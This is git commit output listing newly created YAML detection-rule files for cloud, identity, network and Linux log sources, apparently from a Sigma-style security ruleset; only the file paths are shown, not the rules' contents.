bin/main/rules/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml create mode 100644 bin/main/rules/azure/azure_kubernetes_secret_or_config_object_access.yml create mode 100644 bin/main/rules/azure/azure_kubernetes_service_account_modified_or_deleted.yml create mode 100644 bin/main/rules/azure/azure_login_to_disabled_account.yml create mode 100644 bin/main/rules/azure/azure_mfa_denies.yml create mode 100644 bin/main/rules/azure/azure_mfa_disabled.yml create mode 100644 bin/main/rules/azure/azure_mfa_interrupted.yml create mode 100644 bin/main/rules/azure/azure_network_firewall_policy_modified_or_deleted.yml create mode 100644 bin/main/rules/azure/azure_network_firewall_rule_modified_or_deleted.yml create mode 100644 bin/main/rules/azure/azure_network_p2s_vpn_modified_or_deleted.yml create mode 100644 bin/main/rules/azure/azure_network_security_modified_or_deleted.yml create mode 100644 bin/main/rules/azure/azure_network_virtual_device_modified_or_deleted.yml create mode 100644 bin/main/rules/azure/azure_new_cloudshell_created.yml create mode 100644 bin/main/rules/azure/azure_owner_removed_from_application_or_service_principal.yml create mode 100644 bin/main/rules/azure/azure_rare_operations.yml create mode 100644 bin/main/rules/azure/azure_service_principal_created.yml create mode 100644 bin/main/rules/azure/azure_service_principal_removed.yml create mode 100644 bin/main/rules/azure/azure_subscription_permissions_elevation_via_activitylogs.yml create mode 100644 bin/main/rules/azure/azure_subscription_permissions_elevation_via_auditlogs.yml create mode 100644 bin/main/rules/azure/azure_suppression_rule_created.yml create mode 100644 bin/main/rules/azure/azure_unusual_authentication_interruption.yml create mode 100644 bin/main/rules/azure/azure_user_login_blocked_by_conditional_access.yml create mode 100644 bin/main/rules/azure/azure_virtual_network_modified_or_deleted.yml create mode 100644 bin/main/rules/azure/azure_vpn_connection_modified_or_deleted.yml create mode 100644 bin/main/rules/cloudtrail/aws_attached_malicious_lambda_layer.yml create mode 100644 bin/main/rules/cloudtrail/aws_cloudtrail_disable_logging.yml create mode 100644 bin/main/rules/cloudtrail/aws_config_disable_recording.yml create mode 100644 bin/main/rules/cloudtrail/aws_create_load_balancer_layer.yml create mode 100644 bin/main/rules/cloudtrail/aws_ec2_disable_encryption.yml create mode 100644 bin/main/rules/cloudtrail/aws_ec2_download_userdata.yml create mode 100644 bin/main/rules/cloudtrail/aws_ec2_startup_script_change.yml create mode 100644 bin/main/rules/cloudtrail/aws_ec2_vm_export_failure.yml create mode 100644 bin/main/rules/cloudtrail/aws_ecs_task_definition_backdoor.yml create mode 100644 bin/main/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml create mode 100644 bin/main/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml create mode 100644 bin/main/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml create mode 100644 bin/main/rules/cloudtrail/aws_elasticache_security_group_created.yml create mode 100644 bin/main/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml create mode 100644 bin/main/rules/cloudtrail/aws_enum_listing.yml create mode 100644 bin/main/rules/cloudtrail/aws_guardduty_disruption.yml create mode 100644 bin/main/rules/cloudtrail/aws_iam_backdoor_users_keys.yml create mode 100644 bin/main/rules/cloudtrail/aws_lambda_function_created_or_invoked.yml create mode 100644 bin/main/rules/cloudtrail/aws_macic_evasion.yml create mode 100644 bin/main/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml create mode 100644 bin/main/rules/cloudtrail/aws_rds_change_master_password.yml create mode 100644 bin/main/rules/cloudtrail/aws_rds_public_db_restore.yml create mode 100644 bin/main/rules/cloudtrail/aws_root_account_usage.yml create mode 100644 bin/main/rules/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml create mode 100644 bin/main/rules/cloudtrail/aws_route_53_domain_transferred_to_another_account.yml create mode 100644 bin/main/rules/cloudtrail/aws_s3_data_management_tampering.yml create mode 100644 bin/main/rules/cloudtrail/aws_securityhub_finding_evasion.yml create mode 100644 bin/main/rules/cloudtrail/aws_snapshot_backup_exfiltration.yml create mode 100644 bin/main/rules/cloudtrail/aws_sts_assumerole_misuse.yml create mode 100644 bin/main/rules/cloudtrail/aws_sts_getsessiontoken_misuse.yml create mode 100644 bin/main/rules/cloudtrail/aws_susp_saml_activity.yml create mode 100644 bin/main/rules/cloudtrail/aws_update_login_profile.yml create mode 100644 bin/main/rules/dns/net_dns_c2_detection.yml create mode 100644 bin/main/rules/dns/net_dns_external_service_interaction_domains.yml create mode 100644 bin/main/rules/dns/net_dns_high_bytes_out.yml create mode 100644 bin/main/rules/dns/net_dns_high_null_records_requests_rate.yml create mode 100644 bin/main/rules/dns/net_dns_high_requests_rate.yml create mode 100644 bin/main/rules/dns/net_dns_high_txt_records_requests_rate.yml create mode 100644 bin/main/rules/dns/net_dns_mal_cobaltstrike.yml create mode 100644 bin/main/rules/dns/net_dns_pua_cryptocoin_mining_xmr.yml create mode 100644 bin/main/rules/dns/net_dns_susp_b64_queries.yml create mode 100644 bin/main/rules/dns/net_dns_susp_telegram_api.yml create mode 100644 bin/main/rules/dns/net_dns_susp_txt_exec_strings.yml create mode 100644 bin/main/rules/dns/net_dns_wannacry_killswitch_domain.yml create mode 100644 bin/main/rules/github/github_delete_action_invoked.yml create mode 100644 bin/main/rules/github/github_disable_high_risk_configuration.yml create mode 100644 bin/main/rules/github/github_disabled_outdated_dependency_or_vulnerability.yml create mode 100644 bin/main/rules/github/github_new_org_member.yml create mode 100644 bin/main/rules/github/github_new_secret_created.yml create mode 100644 bin/main/rules/github/github_outside_collaborator_detected.yml create mode 100644 bin/main/rules/github/github_self_hosted_runner_changes_detected.yml create mode 100644 bin/main/rules/gworkspace/gworkspace_application_removed.yml create mode 100644 bin/main/rules/gworkspace/gworkspace_granted_domain_api_access.yml create mode 100644 bin/main/rules/gworkspace/gworkspace_mfa_disabled.yml create mode 100644 bin/main/rules/gworkspace/gworkspace_role_modified_or_deleted.yml create mode 100644 bin/main/rules/gworkspace/gworkspace_role_privilege_deleted.yml create mode 100644 bin/main/rules/gworkspace/gworkspace_user_granted_admin_privileges.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_alter_bash_profile.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_audio_capture.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_auditing_config_change.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_binary_padding.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_capabilities_discovery.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_clipboard_collection.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_coinminer.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_create_account.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_cve_2021_4034.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_data_compressed.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_data_exfil_wget.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_dd_delete_file.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_load_module_insmod.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_logging_config_change.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_masquerading_crond.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_network_service_scanning.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_network_sniffing.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_screencapture_import.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_susp_cmds.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_system_info_discovery.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_user_discovery.yml create mode 100644 bin/main/rules/linux/auditd/lnx_auditd_web_rce.yml create mode 100644 bin/main/rules/linux/builtin/lnx_buffer_overflows.yml create mode 100644 bin/main/rules/linux/builtin/lnx_clear_syslog.yml create mode 100644 bin/main/rules/linux/builtin/lnx_crontab_file_modification.yml create mode 100644 bin/main/rules/linux/builtin/lnx_file_copy.yml create mode 100644 bin/main/rules/linux/builtin/lnx_ldso_preload_injection.yml create mode 100644 bin/main/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml create mode 100644 bin/main/rules/linux/builtin/lnx_proxy_connection.yml create mode 100644 bin/main/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml create mode 100644 bin/main/rules/linux/builtin/lnx_setgid_setuid.yml create mode 100644 bin/main/rules/linux/builtin/lnx_shell_clear_cmd_history.yml create mode 100644 bin/main/rules/linux/builtin/lnx_shell_priv_esc_prep.yml create mode 100644 bin/main/rules/linux/builtin/lnx_shell_susp_commands.yml create mode 100644 bin/main/rules/linux/builtin/lnx_shell_susp_log_entries.yml create mode 100644 bin/main/rules/linux/builtin/lnx_shell_susp_rev_shells.yml create mode 100644 bin/main/rules/linux/builtin/lnx_shellshock.yml create mode 100644 bin/main/rules/linux/builtin/lnx_space_after_filename_.yml create mode 100644 bin/main/rules/linux/builtin/lnx_sudo_cve_2019_14287.yml create mode 100644 bin/main/rules/linux/builtin/lnx_sudo_cve_2019_14287_user.yml create mode 100644 bin/main/rules/linux/builtin/lnx_susp_dev_tcp.yml create mode 100644 bin/main/rules/linux/builtin/lnx_susp_jexboss.yml create mode 100644 bin/main/rules/linux/builtin/lnx_symlink_etc_passwd.yml create mode 100644 bin/main/rules/linux/file_create/file_create_lnx_cron_files.yml create mode 100644 bin/main/rules/linux/file_create/file_create_lnx_doas_conf_creation.yml create mode 100644 bin/main/rules/linux/modsecurity/modsec_mulitple_blocks.yml create mode 100644 bin/main/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml create mode 100644 bin/main/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml create mode 100644 bin/main/rules/linux/other/lnx_clamav.yml create mode 100644 bin/main/rules/linux/other/lnx_security_tools_disabling_syslog.yml create mode 100644 bin/main/rules/linux/other/lnx_ssh_cve_2018_15473.yml create mode 100644 bin/main/rules/linux/other/lnx_susp_failed_logons_single_source.yml create mode 100644 bin/main/rules/linux/other/lnx_susp_guacamole.yml create mode 100644 bin/main/rules/linux/other/lnx_susp_named.yml create mode 100644 bin/main/rules/linux/other/lnx_susp_ssh.yml create mode 100644 bin/main/rules/linux/other/lnx_susp_vsftp.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_at_command.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_clear_logs.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_local_account.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_local_groups.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_network_service_scanning.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_nohup.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executescript.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_omigod_scx_runasprovider_executeshellcommand.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_process_discovery.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_python_pty_spawn.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_remote_system_discovery.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml create mode 100644 bin/main/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml create mode 100644 bin/main/rules/m365/microsoft365_activity_by_terminated_user.yml create mode 100644 bin/main/rules/m365/microsoft365_activity_from_anonymous_ip_addresses.yml create mode 100644 bin/main/rules/m365/microsoft365_activity_from_infrequent_country.yml create mode 100644 bin/main/rules/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml create mode 100644 bin/main/rules/m365/microsoft365_from_susp_ip_addresses.yml create mode 100644 bin/main/rules/m365/microsoft365_impossible_travel_activity.yml create mode 100644 bin/main/rules/m365/microsoft365_logon_from_risky_ip_address.yml create mode 100644 bin/main/rules/m365/microsoft365_new_federated_domain_added.yml create mode 100644 bin/main/rules/m365/microsoft365_potential_ransomware_activity.yml create mode 100644 bin/main/rules/m365/microsoft365_pst_export_alert.yml create mode 100644 bin/main/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml create mode 100644 bin/main/rules/m365/microsoft365_susp_inbox_forwarding.yml create mode 100644 bin/main/rules/m365/microsoft365_susp_oauth_app_file_download_activities.yml create mode 100644 bin/main/rules/m365/microsoft365_unusual_volume_of_file_deletion.yml create mode 100644 bin/main/rules/m365/microsoft365_user_restricted_from_sending_email.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_clear_logs.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_collect_data.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_disable_logging.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_discovery.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_dos.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_file_deletion.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_input_capture.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_local_accounts.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_modify_config.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_moving_data.yml create mode 100644 bin/main/rules/network/cisco/aaa/cisco_cli_net_sniff.yml create mode 100644 bin/main/rules/network/firewall/net_firewall_high_dns_bytes_out.yml create mode 100644 bin/main/rules/network/firewall/net_firewall_high_dns_requests_rate.yml create mode 100644 bin/main/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml create mode 100644 bin/main/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml create mode 100644 bin/main/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml create mode 100644 bin/main/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml create mode 100644 bin/main/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml create mode 100644 bin/main/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml create mode 100644 bin/main/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml create mode 100644 bin/main/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml create mode 100644 bin/main/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml create mode 100644 bin/main/rules/network/zeek/zeek_dns_mining_pools.yml create mode 100644 bin/main/rules/network/zeek/zeek_dns_nkn.yml create mode 100644 bin/main/rules/network/zeek/zeek_dns_susp_zbit_flag.yml create mode 100644 bin/main/rules/network/zeek/zeek_dns_torproxy.yml create mode 100644 bin/main/rules/network/zeek/zeek_http_executable_download_from_webdav.yml create mode 100644 bin/main/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml create mode 100644 bin/main/rules/network/zeek/zeek_http_webdav_put_request.yml create mode 100644 bin/main/rules/network/zeek/zeek_rdp_public_listener.yml create mode 100644 bin/main/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml create mode 100644 bin/main/rules/network/zeek/zeek_smb_converted_win_impacket_secretdump.yml create mode 100644 bin/main/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml create mode 100644 bin/main/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml create mode 100644 bin/main/rules/network/zeek/zeek_smb_converted_win_susp_raccess_sensitive_fext.yml create mode 100644 bin/main/rules/network/zeek/zeek_smb_converted_win_transferring_files_with_credential_data.yml create mode 100644 bin/main/rules/network/zeek/zeek_susp_kerberos_rc4.yml create mode 100644 bin/main/rules/okta/okta_admin_role_assigned_to_user_or_group.yml create mode 100644 bin/main/rules/okta/okta_admin_role_assignment_created.yml create mode 100644 bin/main/rules/okta/okta_api_token_created.yml create mode 100644 bin/main/rules/okta/okta_api_token_revoked.yml create mode 100644 bin/main/rules/okta/okta_application_modified_or_deleted.yml create mode 100644 bin/main/rules/okta/okta_application_sign_on_policy_modified_or_deleted.yml create mode 100644 bin/main/rules/okta/okta_mfa_reset_or_deactivated.yml create mode 100644 bin/main/rules/okta/okta_network_zone_deactivated_or_deleted.yml create mode 100644 bin/main/rules/okta/okta_policy_modified_or_deleted.yml create mode 100644 bin/main/rules/okta/okta_policy_rule_modified_or_deleted.yml create mode 100644 bin/main/rules/okta/okta_security_threat_detected.yml create mode 100644 bin/main/rules/okta/okta_unauthorized_access_to_app.yml create mode 100644 bin/main/rules/okta/okta_user_account_locked_out.yml create mode 100644 bin/main/rules/others_application/antivirus/av_exploiting.yml create mode 100644 bin/main/rules/others_application/antivirus/av_hacktool.yml create mode 100644 bin/main/rules/others_application/antivirus/av_password_dumper.yml create mode 100644 bin/main/rules/others_application/antivirus/av_printernightmare_cve_2021_34527.yml create mode 100644 bin/main/rules/others_application/antivirus/av_ransomware.yml create mode 100644 bin/main/rules/others_application/antivirus/av_relevant_files.yml create mode 100644 bin/main/rules/others_application/antivirus/av_webshell.yml create mode 100644 bin/main/rules/others_application/django/appframework_django_exceptions.yml create mode 100644 bin/main/rules/others_application/python/app_python_sql_exceptions.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_atsvc_recon.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_dcsync_attack.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_efs_abuse.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_eventlog_recon.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_registry_recon.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_sasec_recon.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml create mode 100644 bin/main/rules/others_application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml create mode 100644 bin/main/rules/others_application/ruby/appframework_ruby_on_rails_exceptions.yml create mode 100644 bin/main/rules/others_application/spring/appframework_spring_exceptions.yml create mode 100644 bin/main/rules/others_application/sql/app_sqlinjection_errors.yml create mode 100644 bin/main/rules/others_apt/apt_silence_downloader_v3.yml create mode 100644 bin/main/rules/others_apt/apt_silence_eda.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_aadhybridhealth_adfs_new_server.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_account_lockout.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_ad_bitlocker_key_retrieval.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_ad_device_registration_policy_changes.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_ad_user_added_to_admin_role.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_ad_users_added_to_device_admin_roles.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_app_appid_uri_changes.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_app_credential_added.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_app_credential_modification.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_app_device_code_authentication.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_app_owner_added.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_app_ropc_authentication.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_app_uri_modifications.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_application_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_application_gateway_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_application_security_group_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_blocked_account_attempt.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_change_to_authentication_method.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_conditional_access_failure.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_container_registry_created_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_creating_number_of_resources_detection.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_device_no_longer_managed_or_compliant.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_device_or_configuration_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_dns_zone_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_federation_modified.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_firewall_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_granting_permission_detection.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_keyvault_key_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_keyvault_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_admission_controller.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_cronjob.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_events_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_network_policy_change.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_pods_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_role_access.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_secret_or_config_object_access.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_login_to_disabled_account.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_mfa_denies.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_mfa_disabled.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_mfa_interrupted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_network_security_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_network_virtual_device_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_new_cloudshell_created.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_owner_removed_from_application_or_service_principal.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_rare_operations.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_service_principal_created.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_service_principal_removed.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_suppression_rule_created.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_unusual_authentication_interruption.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_user_login_blocked_by_conditional_access.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_virtual_network_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/azure/azure_vpn_connection_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_bucket_enumeration.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_bucket_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_dns_zone_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml create mode 100644 bin/main/rules/others_cloud/gcp/gcp_full_network_traffic_packet_capture.yml create mode 100644 